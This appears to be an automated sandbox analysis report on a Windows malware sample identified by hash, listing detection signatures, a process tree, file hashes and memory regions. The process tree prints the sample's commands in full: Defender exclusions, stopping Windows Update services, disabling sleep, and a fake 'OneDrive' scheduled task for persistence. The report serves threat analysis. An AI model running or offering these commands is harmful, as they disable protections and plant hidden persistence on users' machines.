Analysis

  • max time kernel
    33s
  • max time network
    38s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-05-2023 18:40

General

  • Target

    ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe

  • Size

    8.7MB

  • MD5

    6a38b46d48afeae349b698a429ae1e1c

  • SHA1

    891c831af6e60cfded62268276e4ffffd203f27e

  • SHA256

    ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5

  • SHA512

    470ae81eb635aa4b50b3213544ce85de16b87eaba8cf0fa46ca00989df2fa88fcadb1d834c58a5a7d84b3718515f6fd359a9a946035222b944b3df3e7b87bdf5

  • SSDEEP

    196608:kxKMARSuV2XJXf6hzsy07g1vse0yEn2ii+Iv5tUOX:/FRSJXlf6Z8gWnyiqxtN

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Suspicious use of SetThreadContext 1 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3160
      • C:\Users\Admin\AppData\Local\Temp\ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe
        "C:\Users\Admin\AppData\Local\Temp\ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Checks BIOS information in registry
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:3116
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4396
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:228
        • C:\Windows\System32\sc.exe
          sc stop UsoSvc
          3⤵
          • Launches sc.exe
          PID:4296
        • C:\Windows\System32\sc.exe
          sc stop WaaSMedicSvc
          3⤵
          • Launches sc.exe
          PID:4308
        • C:\Windows\System32\sc.exe
          sc stop wuauserv
          3⤵
          • Launches sc.exe
          PID:4352
        • C:\Windows\System32\sc.exe
          sc stop bits
          3⤵
          • Launches sc.exe
          PID:4328
        • C:\Windows\System32\sc.exe
          sc stop dosvc
          3⤵
          • Launches sc.exe
          PID:4292
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4984
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2148
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1512
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-ac 0
          3⤵
            PID:8
          • C:\Windows\System32\powercfg.exe
            powercfg /x -standby-timeout-dc 0
            3⤵
              PID:512
          • C:\Windows\System32\dialer.exe
            C:\Windows\System32\dialer.exe
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4428
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yramilr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1648

        Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          2KB

          MD5

          d85ba6ff808d9e5444a4b369f5bc2730

          SHA1

          31aa9d96590fff6981b315e0b391b575e4c0804a

          SHA256

          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

          SHA512

          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          a8e8360d573a4ff072dcc6f09d992c88

          SHA1

          3446774433ceaf0b400073914facab11b98b6807

          SHA256

          bf5e284e8f95122bf75ead61c7e2b40f55c96742b05330b5b1cb7915991df13b

          SHA512

          4ee5167643d82082f57c42616007ef9be57f43f9731921bdf7bca611a914724ad94072d3c8f5b130fa54129e5328ccdebf37ba74339c37deb53e79df5cdf0dbe

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_shddsih2.pl1.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • memory/64-177-0x0000016DE92F0000-0x0000016DE9317000-memory.dmp

          Filesize

          156KB

        • memory/64-192-0x0000016DE92F0000-0x0000016DE9317000-memory.dmp

          Filesize

          156KB

        • memory/64-179-0x00007FFC2A1F0000-0x00007FFC2A200000-memory.dmp

          Filesize

          64KB

        • memory/436-195-0x0000024EFF110000-0x0000024EFF137000-memory.dmp

          Filesize

          156KB

        • memory/436-185-0x00007FFC2A1F0000-0x00007FFC2A200000-memory.dmp

          Filesize

          64KB

        • memory/436-182-0x0000024EFF110000-0x0000024EFF137000-memory.dmp

          Filesize

          156KB

        • memory/588-167-0x00007FFC2A1F0000-0x00007FFC2A200000-memory.dmp

          Filesize

          64KB

        • memory/588-186-0x000001F9728B0000-0x000001F9728D7000-memory.dmp

          Filesize

          156KB

        • memory/588-166-0x000001F9728B0000-0x000001F9728D7000-memory.dmp

          Filesize

          156KB

        • memory/588-164-0x000001F972880000-0x000001F9728A1000-memory.dmp

          Filesize

          132KB

        • memory/664-188-0x000002C5CA160000-0x000002C5CA187000-memory.dmp

          Filesize

          156KB

        • memory/664-168-0x000002C5CA160000-0x000002C5CA187000-memory.dmp

          Filesize

          156KB

        • memory/664-171-0x00007FFC2A1F0000-0x00007FFC2A200000-memory.dmp

          Filesize

          64KB

        • memory/728-196-0x00007FFC2A1F0000-0x00007FFC2A200000-memory.dmp

          Filesize

          64KB

        • memory/728-193-0x0000017E80970000-0x0000017E80997000-memory.dmp

          Filesize

          156KB

        • memory/728-199-0x0000017E80970000-0x0000017E80997000-memory.dmp

          Filesize

          156KB

        • memory/916-202-0x00007FFC2A1F0000-0x00007FFC2A200000-memory.dmp

          Filesize

          64KB

        • memory/916-197-0x000001D299FB0000-0x000001D299FD7000-memory.dmp

          Filesize

          156KB

        • memory/916-204-0x000001D299FB0000-0x000001D299FD7000-memory.dmp

          Filesize

          156KB

        • memory/956-175-0x00000269061D0000-0x00000269061F7000-memory.dmp

          Filesize

          156KB

        • memory/956-190-0x00000269061D0000-0x00000269061F7000-memory.dmp

          Filesize

          156KB

        • memory/956-178-0x00007FFC2A1F0000-0x00007FFC2A200000-memory.dmp

          Filesize

          64KB

        • memory/1012-205-0x00007FFC2A1F0000-0x00007FFC2A200000-memory.dmp

          Filesize

          64KB

        • memory/1012-207-0x0000024427340000-0x0000024427367000-memory.dmp

          Filesize

          156KB

        • memory/1012-201-0x0000024427340000-0x0000024427367000-memory.dmp

          Filesize

          156KB

        • memory/1116-255-0x0000021DFC1B0000-0x0000021DFC1D7000-memory.dmp

          Filesize

          156KB

        • memory/1116-211-0x00007FFC2A1F0000-0x00007FFC2A200000-memory.dmp

          Filesize

          64KB

        • memory/1116-209-0x0000021DFC1B0000-0x0000021DFC1D7000-memory.dmp

          Filesize

          156KB

        • memory/1196-212-0x00007FFC2A1F0000-0x00007FFC2A200000-memory.dmp

          Filesize

          64KB

        • memory/1196-259-0x0000017AF49B0000-0x0000017AF49D7000-memory.dmp

          Filesize

          156KB

        • memory/1196-210-0x0000017AF49B0000-0x0000017AF49D7000-memory.dmp

          Filesize

          156KB

        • memory/1208-217-0x000001EC03590000-0x000001EC035B7000-memory.dmp

          Filesize

          156KB

        • memory/1208-219-0x00007FFC2A1F0000-0x00007FFC2A200000-memory.dmp

          Filesize

          64KB

        • memory/1208-264-0x000001EC03590000-0x000001EC035B7000-memory.dmp

          Filesize

          156KB

        • memory/1332-223-0x00007FFC2A1F0000-0x00007FFC2A200000-memory.dmp

          Filesize

          64KB

        • memory/1332-268-0x000001DEFE8E0000-0x000001DEFE907000-memory.dmp

          Filesize

          156KB

        • memory/1332-220-0x000001DEFE8E0000-0x000001DEFE907000-memory.dmp

          Filesize

          156KB

        • memory/1352-224-0x00007FFC2A1F0000-0x00007FFC2A200000-memory.dmp

          Filesize

          64KB

        • memory/1352-221-0x000002868BEE0000-0x000002868BF07000-memory.dmp

          Filesize

          156KB

        • memory/1360-279-0x0000014F11200000-0x0000014F11227000-memory.dmp

          Filesize

          156KB

        • memory/1360-232-0x00007FFC2A1F0000-0x00007FFC2A200000-memory.dmp

          Filesize

          64KB

        • memory/1360-229-0x0000014F11200000-0x0000014F11227000-memory.dmp

          Filesize

          156KB

        • memory/1400-285-0x0000017EBDDA0000-0x0000017EBDDC7000-memory.dmp

          Filesize

          156KB

        • memory/1400-234-0x00007FFC2A1F0000-0x00007FFC2A200000-memory.dmp

          Filesize

          64KB

        • memory/1400-231-0x0000017EBDDA0000-0x0000017EBDDC7000-memory.dmp

          Filesize

          156KB

        • memory/1648-152-0x000001C761380000-0x000001C761390000-memory.dmp

          Filesize

          64KB

        • memory/1648-153-0x000001C761380000-0x000001C761390000-memory.dmp

          Filesize

          64KB

        • memory/1648-184-0x000001C761380000-0x000001C761390000-memory.dmp

          Filesize

          64KB

        • memory/3116-172-0x00007FF688E20000-0x00007FF689D7D000-memory.dmp

          Filesize

          15.4MB

        • memory/3116-133-0x00007FF688E20000-0x00007FF689D7D000-memory.dmp

          Filesize

          15.4MB

        • memory/4396-145-0x000002106BD70000-0x000002106BD80000-memory.dmp

          Filesize

          64KB

        • memory/4396-134-0x000002106BD30000-0x000002106BD52000-memory.dmp

          Filesize

          136KB

        • memory/4396-144-0x000002106BD70000-0x000002106BD80000-memory.dmp

          Filesize

          64KB

        • memory/4428-150-0x00007FFC68620000-0x00007FFC686DE000-memory.dmp

          Filesize

          760KB

        • memory/4428-180-0x00007FF6CAE30000-0x00007FF6CAE59000-memory.dmp

          Filesize

          164KB

        • memory/4428-149-0x00007FFC6A170000-0x00007FFC6A365000-memory.dmp

          Filesize

          2.0MB